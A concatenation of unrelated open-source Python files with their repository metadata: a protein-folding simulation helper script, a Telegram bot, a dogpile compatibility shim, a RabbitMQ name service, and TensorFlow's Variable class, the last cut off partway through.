str(randint(1, 10**6)) +
"'/g' 2xov.in")
os.system("sbatch run.slurm")
os.chdir("..")
# if(args.go):
# continue_run()
# parser = argparse.ArgumentParser(
# description="This is my playground for current project")
# parser.add_argument("protein", help="the name of protein")
# # parser.add_argument("template", help="the name of template file")
# args = parser.parse_args()
# # protein_name = args.template.split('_', 1)[-1].strip('/')
# protein_name = args.protein.strip('/')
# name = "ga_2m"
## -------------Pulling--------
# os.system("cp ~/opt/small_script/springForce.plt .")
# os.system("cp ~/opt/small_script/springForce_smooth.plt .")
# os.system("gnuplot springForce.plt")
# os.system("gnuplot springForce_smooth.plt")
# os.system("open springForce.pdf")
# os.system("open springForce_smooth.pdf")
# SpringConstant_list = [3e-05, 5e-05, 1e-06, 3e-06, 5e-06, 1e-05, 1e-07]
# # SpringConstant_list = [3e-06, 5e-06]
# for SpringConstant in SpringConstant_list:
# name = "spring"+str(SpringConstant)
# os.system("mkdir "+name)
# os.chdir(name)
# os.system("cp -r ../2xov/ .")
# os.system("cp ../variables.dat .")
# os.chdir("2xov")
# os.system( # replace SIMULATION_STEPS with specific steps
# "sed -i.bak 's/SpringForce/'" +
# str(SpringConstant) +
# "'/g' "+protein_name+".in")
# os.chdir("..")
# os.system("run.py 2xov/ -s 8 -n 2")
# os.chdir("..")
# number_of_run_list = [2, 4, 8, 16]
# for n in number_of_run_list:
# name = "ga_"+str(n)+"m"
# # os.system("mkdir "+name)
# os.system("cp -r 2lhd.pdb "+name)
#
# # os.system("cp -r 2lhc variables.dat "+name)
# os.chdir(name)
# for i in range(20):
# os.chdir("analysis/"+str(i))
# os.system("cp ../../2lhd.pdb .")
# os.system("python2 ~/opt/script/CalcQValue.py 2lhd.pdb dump.lammpstrj q_gb.dat")
# os.system("python2 ~/opt/script/CalcQValue.py 2lhc.pdb dump.lammpstrj q_ga.dat")
# os.system("cp ~/opt/small_script/qw_gagb.plt .")
# os.system("gnuplot qw_gagb.plt")
# os.system("mv qw_gagb.pdf ../../results/qw_gagb_{0}.pdf".format(str(i)))
# os.chdir("../..")
# os.chdir("..")
#
# for n in number_of_run_list:
# name = "ga_"+str(n)+"m"
# # os.system("mkdir "+name)
# os.system("cp -r 2lhd.pdb "+name)
#
# # os.system("cp -r 2lhc variables.dat "+name)
# os.chdir(name)
# for i in range(20):
# os.chdir("analysis/"+str(i))
# os.system("paste q_ga.dat q_gb.dat > q_gagb.dat")
# os.system("cp ~/opt/small_script/qw_ga-gb.plt .")
# os.system("gnuplot qw_ga-gb.plt")
# os.system("mv qw_ga-gb.pdf ../../results/qw_ga-gb_{0}.pdf".format(str(i)))
# os.chdir("../..")
# os.system("cp ~/opt/small_script/qw_ga_all.plt .")
# os.system("gnuplot qw_ga_all.plt")
# os.system("cp ~/opt/small_script/qw_gb_all.plt .")
# os.system("gnuplot qw_gb_all.plt")
# os.system("cp ~/opt/small_script/qw_diff_all.plt .")
# os.system("gnuplot qw_diff_all.plt")
# os.chdir("..")
# simulation_steps = 4 * 10**6
# warm_up_steps = 10 * 10**5
#
# seed(datetime.now())
# n= 20
# vmd = "/Applications/VMD\ 1.9.2.app/Contents/MacOS/startup.command"
#
# os.system("BuildAllAtomsFromLammps.py dump.lammpstrj movie")
# os.system("cp ~/opt/plot_scripts/2xov_movie.tcl .")
# os.system(vmd+" -e 2xov_movie.tcl ")
# os.system("mkdir -p MyResults")
# for i in range(n):
# print(i)
# os.chdir("analysis/"+str(i))
# os.system("cp ~/opt/plot_scripts/2xov_movie_screenshot.tcl .")
# os.system(vmd+" -e 2xov_movie_screenshot.tcl")
# os.system("cp frame1000.tga ../../MyResults/frame"+str(i)+"_1000.tga")
# #os.system("cp frame450.tga ../Results/frame"+folder_name+"_450.tga")
# # os.system("movie.py "+protein_name)
# os.chdir("../..")
# # analysis
# folder_name = ""
# result_folder = "WeiLu_Aug_07"
# protein_list = ['T089', 'T120', 'T251', 'TOP7', '1UBQ']
# sublist = ['']
# # sublist = ['_ha', '_he']
# # sublist = ['_lp', '_he_lp']
# # folder_list = []
# for protein in protein_list:
# for sub in sublist:
# folder_name = protein+sub
# os.chdir(folder_name)
# os.chdir("best_2nd")
# os.system("pymol ~/opt/plot_scripts/align.pml > matrix.dat")
# os.system("head -n 70 matrix.dat | tail -n 20 > cealign_matrix.dat")
# # for i in range(19, -1, -1):
# # os.system("mv {}.pdb {}.pdb".format(i, i+1))
# os.chdir("../..")
# os.chdir(protein)
# os.chdir("best_1st")
# os.system("python3 ~/opt/small_script/cross_q.py")
# os.chdir("..")
# os.chdir("best_2nd")
# os.system("python3 ~/opt/small_script/cross_q.py")
# os.chdir("..")
# os.chdir("..")
# n = 3
# for i in range(n):
# # simulation set up
# folder_name = str(i)
# os.system("mkdir -p "+folder_name)
# os.system("cp -r "+args.protein+"* "+folder_name)
# os.chdir(folder_name)
# os.system("cp ../../helix_less/simulation/"+str(i)+"/restart.4000000 .")
# os.system( # replace SIMULATION_STEPS with specific steps
# "sed -i.bak 's/WARM_UP_STEPS/'" +
# str(warm_up_steps) +
# "'/g' "+protein_name+".in")
# os.system( # replace RANDOM with a radnom number
# "sed -i.bak 's/RANDOM/'" +
# str(randint(1, 10**6)) +
# "'/g' "+protein_name+".in")
# os.system( # replace SIMULATION_STEPS with specific steps
# "sed -i.bak 's/SIMULATION_STEPS/'" +
# str(simulation_steps) +
# "'/g' "+protein_name+".in")
# # if(platform.system() == 'Darwin'):
# # os.system("/Users/weilu/Documents/lammps-9Oct12_modified/src/lmp_serial \
# # < "+protein_name+".in")
# if(platform.system() == 'Darwin'):
# os.system("/Users/weilu/Documents/lammps-9Oct12_modified/src/lmp_serial \
# < "+protein_name+".in")
# elif(platform.system() == 'Linux'):
# os.system("cp ~/opt/run.slurm .")
# os.system( # replace PROTEIN with pdb name
# "sed -i.bak 's/PROTEIN/'" +
# protein_name +
# "'/g' run.slurm")
# os.system("sbatch run.slurm")
# else:
# print("system unkown")
# os.chdir("..")
# exit(1)
# w_helix_list = [0.1, 0.5, 1, 1.5]
# m_helix_list = [0.1, 0.5, 1, 1.5]
#
# for i in range(len(w_helix_list)):
# w = w_helix_list[i]
# for j in range(len(m_helix_list)):
#
# # m = m_helix_list[j]
# folder_name = str(i)+"_"+str(j)
# # os.system("cd "folder_name)
# os.chdir(folder_name)
# # os.system("analysis.py 2xov/")
# # os.system("echo "+folder_name+" >> ../all")
# os.system("sort -k 3 analysis/list_of_max_q > ../data/"+folder_name)
# os.chdir("..")
# # os.system("mkdir "+folder_name)
# # os.chdir(folder_name)
# # os.system("cp -r ../2xov .")
# # os.chdir("2xov")
# # os.system(
# # "sed -i.bak 's/W_HELIX/'" +
# # str(w) +
# # "'/g' fix_backbone_coeff.data")
# # os.system(
# # "sed -i.bak 's/M_HELIX/'" +
# # str(m) +
# # "'/g' fix_backbone_coeff.data")
# # os.chdir("..")
# # os.system("run.py 2xov/ -n 5")
# os.system("cp ~/opt/gg.py this_gg.py")
# for i in range(5):
# os.system("mkdir "+str(i))
# os.chdir(str(i))
# os.system("cp -r ../2xov/ .")
# os.system("cp ../../2xov_strong_single_memory_600to500/simulation/"+str(i)+"/restart.2000000 2xov/")
# os.system("run.py -s 4 -n 2 2xov/")
# os.chdir("..")
# # rama_list = [6, 8, 16]
# # rama_list = [4]
# melt_t_list = [400, 500, 600]
# for variable in melt_t_list:
# folder_name = str(variable)
# os.system("mkdir "+folder_name)
# os.chdir(folder_name)
# os.system("cp -r ../1qjp .")
# os.chdir("1qjp")
# os.system(
# "sed -i.bak 's/MELTT/'" +
# str(variable) +
# "'/g' 1qjp.in")
# os.chdir("..")
# # os.system("pwd")
# os.system("run.py 1qjp/ -n 5 -s 5")
# os.chdir("..")
# os.system("cp ~/opt/gg.py this_gg.py")
#
# exec (open("config.py").read())
# n = number_of_run
# steps = simulation_steps
#
# protein_name = args.protein.strip('/')
#
# temp = 400
# folder_name = "{}_t{}_q100_test11".format(protein_name, str(temp))
# print("all going to "+folder_name)
# os.system("mkdir -p "+folder_name)
# os.system("rm -f "+folder_name + "/*")
# command = 'cat simulation/{}/%d/wham11 \
# >> {}/all_wham.dat'.format(temp, folder_name)
# # cal rmsd
# os.chdir("simulation/"+str(temp))
# for i in range(n):
# os.chdir(str(i))
# os.system("awk '{print>\"file1\"(NR>(n/2)?2:1)}' n=\"$(wc -l <file1)\" file1")
# os.system("cat file11 >> ../../../"+folder_name+"/rmsd_total")
# # os.system("sed 1d wham.dat > wham1d.dat")
# os.system("awk '{print>\"wham1\"(NR>(n/2)?2:1)}' n=\"$(wc -l <wham1)\" wham1")
# os.chdir("..")
# os.chdir("../..")
# for i in range(n):
# cmd = command % i
# os.system(cmd)
# os.chdir(folder_name)
# os.system("awk '{print $2}' all_wham.dat > Qw_total")
# os.system("awk '{print $3}' all_wham.dat > rg_total")
# os.system("awk '{print $4}' all_wham.dat > p_total")
# os.system("awk '{print $5}' all_wham.dat > tc_total")
# os.system("awk '{print $NF}' all_wham.dat > e_total")
# os.system("cp ~/opt/wham_analysis/*.m .")
# os.chdir("..")
# os.system("~/opt/script/wham/fused_calc_cv.sc {} top7 50 400 350 450 5 50 100 0 0.98".format(folder_name))
#
#
# folder_name = "{}_t{}_q100_test12".format(protein_name, str(temp))
# print("all going to "+folder_name)
# os.system("mkdir -p "+folder_name)
# os.system("rm -f "+folder_name + "/*")
# command = 'cat simulation/{}/%d/wham12 \
# >> {}/all_wham.dat'.format(temp, folder_name)
# # cal rmsd
# os.chdir("simulation/"+str(temp))
# for i in range(n):
# os.chdir(str(i))
# os.system("cat file12 >> ../../../"+folder_name+"/rmsd_total")
# os.chdir("..")
# os.chdir("../..")
# for i in range(n):
# cmd = command % i
# os.system(cmd)
# os.chdir(folder_name)
# os.system("awk '{print $2}' all_wham.dat > Qw_total")
# os.system("awk '{print $3}' all_wham.dat > rg_total")
# os.system("awk '{print $4}' all_wham.dat > p_total")
# os.system("awk '{print $5}' all_wham.dat > tc_total")
# os.system("awk '{print $NF}' all_wham.dat > e_total")
# os.system("cp ~/opt/wham_analysis/*.m .")
# os.chdir("..")
#
#
#
# os.system("~/opt/script/wham/fused_calc_cv.sc {} top7 50 400 350 450 5 50 100 0 0.98".format(folder_name))
#
# result_folder = "WeiLu_Aug_07"
# os.system("mkdir -p "+result_folder)
# protein_list = ['T089', 'T120', 'T251', 'top7', '1UBQ']
# # sublist = ['_ha', '_he']
# sublist = ['_lp', '_he_lp']
# folder_list = []
# for protein in protein_list:
# for sub in sublist:
# folder_list += [protein+sub]
# print(folder_list)
# # exit(1)
# # awk '{print>'file'(NR>(n/2)?2:1)}' n='$(wc -l <test)' test
# for folder in folder_list:
# print(folder)
# os.chdir(folder)
# exec (open("config.py").read())
# n = number_of_run
# steps = simulation_steps
# os.system("mkdir -p ../{}/".format(result_folder)+folder+"/best_q")
# os.system("sort analysis/list_of_max_q > ../{}/q_".format(result_folder)+folder+".dat")
# for i in range(n):
# # move
# os.chdir("analysis/"+str(i))
# os.system("cp chosen.pdb ../../../{}/".format(result_folder) + folder+"/best_q/"+str(i)+".pdb")
# os.chdir("../..")
# os.chdir("..")
# result_folder = "WeiLu_Aug_07"
# os.system("mkdir -p "+result_folder)
# protein_list = ['T089', 'T120', 'T251', 'top7', '1UBQ']
# # sublist = ['_ha', '_he']
# sublist = ['_lp', '_he_lp']
# folder_list = []
# for protein in protein_list:
# for sub in sublist:
# folder_list += [protein+sub]
# print(folder_list)
# # exit(1)
#
# for folder in folder_list:
# print(folder)
# os.chdir(folder)
# exec (open("config.py").read())
# n = number_of_run
# steps = simulation_steps
# os.system("mkdir -p ../{}/".format(result_folder)+folder+"/best_q")
# os.system("sort analysis/list_of_max_q > ../{}/q_".format(result_folder)+folder+".dat")
# for i in range(n):
# # move
# os.chdir("analysis/"+str(i))
# os.system("cp chosen.pdb ../../../{}/".format(result_folder) + folder+"/best_q/"+str(i)+".pdb")
# os.chdir("../..")
# os.chdir("..")
|
luwei0917/awsemmd_script
|
davinci_gg.py
|
Python
|
mit
| 132,835
|
__author__ = 'antonioirizar'
from twx.botapi import TelegramBot, ReplyKeyboardMarkup, Error
from botonio.user import User
class Botonio:
"""Principal class to run the Bot"""
def __init__(self, token):
self.users = {}
self.bot = TelegramBot(token)
self.bot.update_bot_info().wait()
self.offset = 1
updates = self.bot.get_updates().wait()
if isinstance(updates, Error):
print(updates)
raise Exception('Error to conect with Telegram.')
if len(updates):
self.offset = updates[-1].update_id
def start(self):
while True:
updates = self.bot.get_updates(offset=self.offset).wait()
if not len(updates):
continue
self.offset = updates[-1].update_id
self.offset += 1
for update in updates:
if update.message is None:
continue
sender = update.message.sender
if sender.id not in self.users:
user = User(sender.first_name, sender.id)
self.users[user.user_id] = user
else:
user = self.users[sender.id]
if update.message.text == 'stop':
del self.users[user]
continue
messages = user.process_message(update.message.text)
if isinstance(messages, tuple):
self.bot.send_message(user.user_id, messages[0], reply_markup=self._numeric_keyboard()).wait()
else:
self.bot.send_message(user.user_id, messages).wait()
@staticmethod
def _numeric_keyboard():
keyboard = [
['1', '2'],
['3', '4']
]
return ReplyKeyboardMarkup.create(keyboard)
|
antonioIrizar/telegram-bot-AWS
|
botonio/core.py
|
Python
|
gpl-3.0
| 1,848
|
import collections
import inspect
import sys
py2k = sys.version_info < (3, 0)
py3k = sys.version_info >= (3, 0)
py32 = sys.version_info >= (3, 2)
py27 = sys.version_info >= (2, 7)
jython = sys.platform.startswith("java")
win32 = sys.platform.startswith("win")
try:
import threading
except ImportError:
import dummy_threading as threading # noqa
FullArgSpec = collections.namedtuple(
"FullArgSpec",
[
"args",
"varargs",
"varkw",
"defaults",
"kwonlyargs",
"kwonlydefaults",
"annotations",
],
)
ArgSpec = collections.namedtuple(
"ArgSpec", ["args", "varargs", "keywords", "defaults"]
)
def inspect_getfullargspec(func):
"""Fully vendored version of getfullargspec from Python 3.3."""
if inspect.ismethod(func):
func = func.__func__
if not inspect.isfunction(func):
raise TypeError("{!r} is not a Python function".format(func))
co = func.__code__
if not inspect.iscode(co):
raise TypeError("{!r} is not a code object".format(co))
nargs = co.co_argcount
names = co.co_varnames
nkwargs = co.co_kwonlyargcount if py3k else 0
args = list(names[:nargs])
kwonlyargs = list(names[nargs : nargs + nkwargs])
nargs += nkwargs
varargs = None
if co.co_flags & inspect.CO_VARARGS:
varargs = co.co_varnames[nargs]
nargs = nargs + 1
varkw = None
if co.co_flags & inspect.CO_VARKEYWORDS:
varkw = co.co_varnames[nargs]
return FullArgSpec(
args,
varargs,
varkw,
func.__defaults__,
kwonlyargs,
func.__kwdefaults__ if py3k else None,
func.__annotations__ if py3k else {},
)
def inspect_getargspec(func):
return ArgSpec(*inspect_getfullargspec(func)[0:4])
if py3k: # pragma: no cover
string_types = (str,)
text_type = str
string_type = str
if py32:
callable = callable # noqa
else:
def callable(fn): # noqa
return hasattr(fn, "__call__")
def u(s):
return s
def ue(s):
return s
import configparser
import io
import _thread as thread
else:
# Using noqa bellow due to tox -e pep8 who use
# python3.7 as the default interpreter
string_types = (basestring,) # noqa
text_type = unicode # noqa
string_type = str
def u(s):
return unicode(s, "utf-8") # noqa
def ue(s):
return unicode(s, "unicode_escape") # noqa
import ConfigParser as configparser # noqa
import StringIO as io # noqa
callable = callable # noqa
import thread # noqa
if py3k or jython:
import pickle
else:
import cPickle as pickle # noqa
if py3k:
def read_config_file(config, fileobj):
return config.read_file(fileobj)
else:
def read_config_file(config, fileobj):
return config.readfp(fileobj)
def timedelta_total_seconds(td):
if py27:
return td.total_seconds()
else:
return (
td.microseconds + (td.seconds + td.days * 24 * 3600) * 1e6
) / 1e6
|
pymedusa/SickRage
|
ext/dogpile/util/compat.py
|
Python
|
gpl-3.0
| 3,097
|
import os, pika, json, time, random
some_names = ["Andrew", "Josh", "Peter", "Owen", "Shalita", "Helen", "Natalie", "Simon", "Jamie"]
class Namer(object):
def __init__(self, routes):
self.connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
self.channel = self.connection.channel()
self.exchange = "warren"
self.channel.exchange_declare(exchange=self.exchange, type="topic")
result = self.channel.queue_declare(exclusive=True)
self.queue_name = result.method.queue
for route in routes:
self.channel.queue_bind(exchange=self.exchange,
queue=self.queue_name,
routing_key=route)
def publish(self, route, data):
self.channel.basic_publish(self.exchange, routing_key=route,
body=json.dumps(data),
properties = pika.BasicProperties(content_type="application/json"))
def process(self, ch, method, properties, body):
obj = json.loads(body)
self.publish(method.routing_key + ".rsp", {"first":random.choice(some_names)})
print " [x] %r:%r" % (method.routing_key, body)
def start(self):
self.channel.basic_consume(self.process,queue=self.queue_name,no_ack=True)
self.channel.start_consuming()
def close(self):
self.connection.close()
if __name__ == "__main__":
logger = Namer(["Name.get"])
try:
logger.start()
finally:
logger.close()
|
bobbynewmark/microframeworkexample
|
name_service.py
|
Python
|
bsd-2-clause
| 1,572
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Variable class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.core.framework import variable_pb2
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
class Variable(object):
"""See the [Variables How To](../../how_tos/variables/index.md) for a high
level overview.
A variable maintains state in the graph across calls to `run()`. You add a
variable to the graph by constructing an instance of the class `Variable`.
The `Variable()` constructor requires an initial value for the variable,
which can be a `Tensor` of any type and shape. The initial value defines the
type and shape of the variable. After construction, the type and shape of
the variable are fixed. The value can be changed using one of the assign
methods.
If you want to change the shape of a variable later you have to use an
`assign` Op with `validate_shape=False`.
Just like any `Tensor`, variables created with `Variable()` can be used as
inputs for other Ops in the graph. Additionally, all the operators
overloaded for the `Tensor` class are carried over to variables, so you can
also add nodes to the graph by just doing arithmetic on variables.
```python
import tensorflow as tf
# Create a variable.
w = tf.Variable(<initial-value>, name=<optional-name>)
# Use the variable in the graph like any Tensor.
y = tf.matmul(w, ...another variable or tensor...)
# The overloaded operators are available too.
z = tf.sigmoid(w + y)
# Assign a new value to the variable with `assign()` or a related method.
w.assign(w + 1.0)
w.assign_add(1.0)
```
When you launch the graph, variables have to be explicitly initialized before
you can run Ops that use their value. You can initialize a variable by
running its *initializer op*, restoring the variable from a save file, or
simply running an `assign` Op that assigns a value to the variable. In fact,
the variable *initializer op* is just an `assign` Op that assigns the
variable's initial value to the variable itself.
```python
# Launch the graph in a session.
with tf.Session() as sess:
# Run the variable initializer.
sess.run(w.initializer)
# ...you now can run ops that use the value of 'w'...
```
The most common initialization pattern is to use the convenience function
`initialize_all_variables()` to add an Op to the graph that initializes
all the variables. You then run that Op after launching the graph.
```python
# Add an Op to initialize all variables.
init_op = tf.initialize_all_variables()
# Launch the graph in a session.
with tf.Session() as sess:
# Run the Op that initializes all variables.
sess.run(init_op)
# ...you can now run any Op that uses variable values...
```
If you need to create a variable with an initial value dependent on another
variable, use the other variable's `initialized_value()`. This ensures that
variables are initialized in the right order.
All variables are automatically collected in the graph where they are
created. By default, the constructor adds the new variable to the graph
collection `GraphKeys.VARIABLES`. The convenience function
`all_variables()` returns the contents of that collection.
When building a machine learning model it is often convenient to distinguish
betwen variables holding the trainable model parameters and other variables
such as a `global step` variable used to count training steps. To make this
easier, the variable constructor supports a `trainable=<bool>` parameter. If
`True`, the new variable is also added to the graph collection
`GraphKeys.TRAINABLE_VARIABLES`. The convenience function
`trainable_variables()` returns the contents of this collection. The
various `Optimizer` classes use this collection as the default list of
variables to optimize.
Creating a variable.
@@__init__
@@initialized_value
Changing a variable value.
@@assign
@@assign_add
@@assign_sub
@@scatter_sub
@@count_up_to
@@eval
Properties.
@@name
@@dtype
@@get_shape
@@device
@@initializer
@@graph
@@op
"""
# TODO(touts): Add @@value and @@ref in the docstring above once they are
# ready for consumption.
def __init__(self, initial_value=None, trainable=True, collections=None,
validate_shape=True, caching_device=None, name=None,
variable_def=None, dtype=None):
"""Creates a new variable with value `initial_value`.
The new variable is added to the graph collections listed in `collections`,
which defaults to `[GraphKeys.VARIABLES]`.
If `trainable` is `True` the variable is also added to the graph collection
`GraphKeys.TRAINABLE_VARIABLES`.
This constructor creates both a `variable` Op and an `assign` Op to set the
variable to its initial value.
Args:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.VARIABLES]`.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
variable_def: `VariableDef` protocol buffer. If not `None`, recreates
the Variable object with its contents. `variable_def` and the other
arguments are mutually exclusive.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
Returns:
A Variable.
Raises:
ValueError: If both `variable_def` and initial_value are specified.
ValueError: If the initial value is not specified, or does not have a
shape and `validate_shape` is `True`.
"""
if variable_def:
# If variable_def is provided, recreates the variable from its fields.
if initial_value:
raise ValueError("variable_def and initial_value are mutually "
"exclusive.")
self._init_from_proto(variable_def)
else:
# Create from initial_value.
self._init_from_args(initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype)
def _init_from_args(self, initial_value=None, trainable=True,
collections=None, validate_shape=True,
caching_device=None, name=None, dtype=None):
"""Creates a new variable from arguments.
Args:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.VARIABLES]`.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If None, either the datatype will be kept (if initial_value is
a Tensor) or float32 will be used (if it is a Python object convertible
to a Tensor).
Raises:
ValueError: If the initial value is not specified, or does not have a
shape and `validate_shape` is `True`.
"""
if initial_value is None:
raise ValueError("initial_value must be specified.")
init_from_fn = callable(initial_value)
if init_from_fn and dtype is None:
raise ValueError(
"dtype must also be specified when initial_value is callable.")
if collections is None:
collections = [ops.GraphKeys.VARIABLES]
if trainable and ops.GraphKeys.TRAINABLE_VARIABLES not in collections:
collections = list(collections) + [ops.GraphKeys.TRAINABLE_VARIABLES]
with ops.control_dependencies(None):
with ops.op_scope(
[] if init_from_fn else [initial_value], name, "Variable") as name:
# Get the initial value from a callable function. The real shape of the
# variable will be set later, since under the init_from_fn case, the
# shape won't be known until after the function is invoked.
if init_from_fn:
self._variable = state_ops.variable_op(
[],
dtype.base_dtype,
set_shape=False,
name=name)
with ops.colocate_with(self._variable.op):
with ops.name_scope("Initializer"):
# Colocate the tensors created by the initial_value() function
# with the variable itself.
self._initial_value = ops.convert_to_tensor(initial_value(),
name="initial_value",
dtype=dtype)
# Or get the initial value from a Tensor or Python object.
else:
self._initial_value = ops.convert_to_tensor(initial_value,
name="initial_value",
dtype=dtype)
# In this case, the variable op can't be created until after the
# initial_value has been converted to a Tensor with a known type.
self._variable = state_ops.variable_op(
[],
self._initial_value.dtype.base_dtype,
set_shape=False,
name=name)
# Manually overrides the variable's shape with the initial value's.
if validate_shape:
initial_value_shape = self._initial_value.get_shape()
if not initial_value_shape.is_fully_defined():
raise ValueError("initial_value must have a shape specified: %s"
% self._initial_value)
self._variable.set_shape(initial_value_shape)
# TODO(b/28152992): Remove the below hack modifying the node_def shape
# directly once set_shape() handles it.
self._variable.op.node_def.attr["shape"].shape.CopyFrom(
initial_value_shape.as_proto())
# Assigns initial value.
self._initializer_op = state_ops.assign(
self._variable, self._initial_value,
validate_shape=validate_shape).op
# TODO(vrv): Change this class to not take caching_device, but
# to take the op to colocate the snapshot with, so we can use
# colocation rather than devices.
if caching_device is not None:
with ops.device(caching_device):
self._snapshot = array_ops.identity(self._variable, name="read")
else:
with ops.colocate_with(self._variable.op):
self._snapshot = array_ops.identity(self._variable, name="read")
ops.add_to_collections(collections, self)
self._caching_device = caching_device
self._save_slice_info = None
def _init_from_proto(self, variable_def):
"""Creates a new variable from `VariableDef` protocol buffer.
Args:
variable_def: `VariableDef` protocol buffer.
"""
assert isinstance(variable_def, variable_pb2.VariableDef)
# Create from variable_def.
g = ops.get_default_graph()
self._variable = g.as_graph_element(variable_def.variable_name)
self._initializer_op = g.as_graph_element(variable_def.initializer_name)
self._snapshot = g.as_graph_element(variable_def.snapshot_name)
if variable_def.HasField("save_slice_info_def"):
self._save_slice_info = Variable.SaveSliceInfo(
save_slice_info_def=variable_def.save_slice_info_def)
else:
self._save_slice_info = None
self._caching_device = None
def _as_graph_element(self):
"""Conversion function for Graph.as_graph_element()."""
return self._variable
def _AsTensor(self):
"""Converts this variable to a Tensor.
See [`value()`](#Variable.value).
Returns:
A `Tensor` containing the value of the variable.
"""
return self._snapshot
def __iter__(self):
"""Dummy method to prevent iteration. Do not call.
NOTE(mrry): If we register __getitem__ as an overloaded operator,
Python will valiantly attempt to iterate over the variable's Tensor from 0
to infinity. Declaring this method prevents this unintended behavior.
Raises:
TypeError: when invoked.
"""
raise TypeError("'Variable' object is not iterable.")
def value(self):
"""Returns the last snapshot of this variable.
You usually do not need to call this method as all ops that need the value
of the variable call it automatically through a `convert_to_tensor()` call.
Returns a `Tensor` which holds the value of the variable. You can not
assign a new value to this tensor as it is not a reference to the variable.
See [`ref()`](#Variable.ref) if you want to get a reference to the
variable.
To avoid copies, if the consumer of the returned value is on the same device
as the variable, this actually returns the live value of the variable, not
a copy. Updates to the variable are seen by the consumer. If the consumer
is on a different device it will get a copy of the variable.
Returns:
A `Tensor` containing the value of the variable.
"""
return self._snapshot
def ref(self):
"""Returns a reference to this variable.
You usually do not need to call this method as all ops that need a reference
to the variable call it automatically.
Returns is a `Tensor` which holds a reference to the variable. You can
assign a new value to the variable by passing the tensor to an assign op.
See [`value()`](#Variable.value) if you want to get the value of the
variable.
Returns:
A `Tensor` that is a reference to the variable.
"""
return self._variable
def eval(self, session=None):
"""In a session, computes and returns the value of this variable.
This is not a graph construction method, it does not add ops to the graph.
This convenience method requires a session where the graph containing this
variable has been launched. If no session is passed, the default session is
used. See the [Session class](../../api_docs/python/client.md#Session) for
more information on launching a graph and on sessions.
```python
v = tf.Variable([1, 2])
init = tf.initialize_all_variables()
with tf.Session() as sess:
sess.run(init)
# Usage passing the session explicitly.
print(v.eval(sess))
# Usage with the default session. The 'with' block
# above makes 'sess' the default session.
print(v.eval())
```
Args:
session: The session to use to evaluate this variable. If
none, the default session is used.
Returns:
A numpy `ndarray` with a copy of the value of this variable.
"""
return self._variable.eval(session=session)
def initialized_value(self):
"""Returns the value of the initialized variable.
You should use this instead of the variable itself to initialize another
variable with a value that depends on the value of this variable.
```python
# Initialize 'v' with a random tensor.
v = tf.Variable(tf.truncated_normal([10, 40]))
# Use `initialized_value` to guarantee that `v` has been
# initialized before its value is used to initialize `w`.
# The random values are picked only once.
w = tf.Variable(v.initialized_value() * 2.0)
```
Returns:
A `Tensor` holding the value of this variable after its initializer
has run.
"""
with ops.control_dependencies(None):
with ops.control_dependencies([self._initializer_op]):
# TODO(vrv): Change this class to not take caching_device, but
# to take the op to colocate the snapshot with, so we can use
# colocation rather than devices.
if self._caching_device is not None:
with ops.device(self._caching_device):
return array_ops.identity(self._variable)
else:
with ops.colocate_with(self._variable.op):
return array_ops.identity(self._variable)
@property
def initial_value(self):
"""Returns the Tensor used as the initial value for the variable.
Note that this is different from `initialized_value()` which runs
the op that initializes the variable before returning its value.
This method returns the tensor that is used by the op that initializes
the variable.
Returns:
A `Tensor`.
"""
return self._initial_value
def assign(self, value, use_locking=False):
"""Assigns a new value to the variable.
This is essentially a shortcut for `assign(self, value)`.
Args:
value: A `Tensor`. The new value for this variable.
use_locking: If `True`, use locking during the assignment.
Returns:
A `Tensor` that will hold the new value of this variable after
the assignment has completed.
"""
return state_ops.assign(self._variable, value, use_locking=use_locking)
def assign_add(self, delta, use_locking=False):
"""Adds a value to this variable.
This is essentially a shortcut for `assign_add(self, delta)`.
Args:
delta: A `Tensor`. The value to add to this variable.
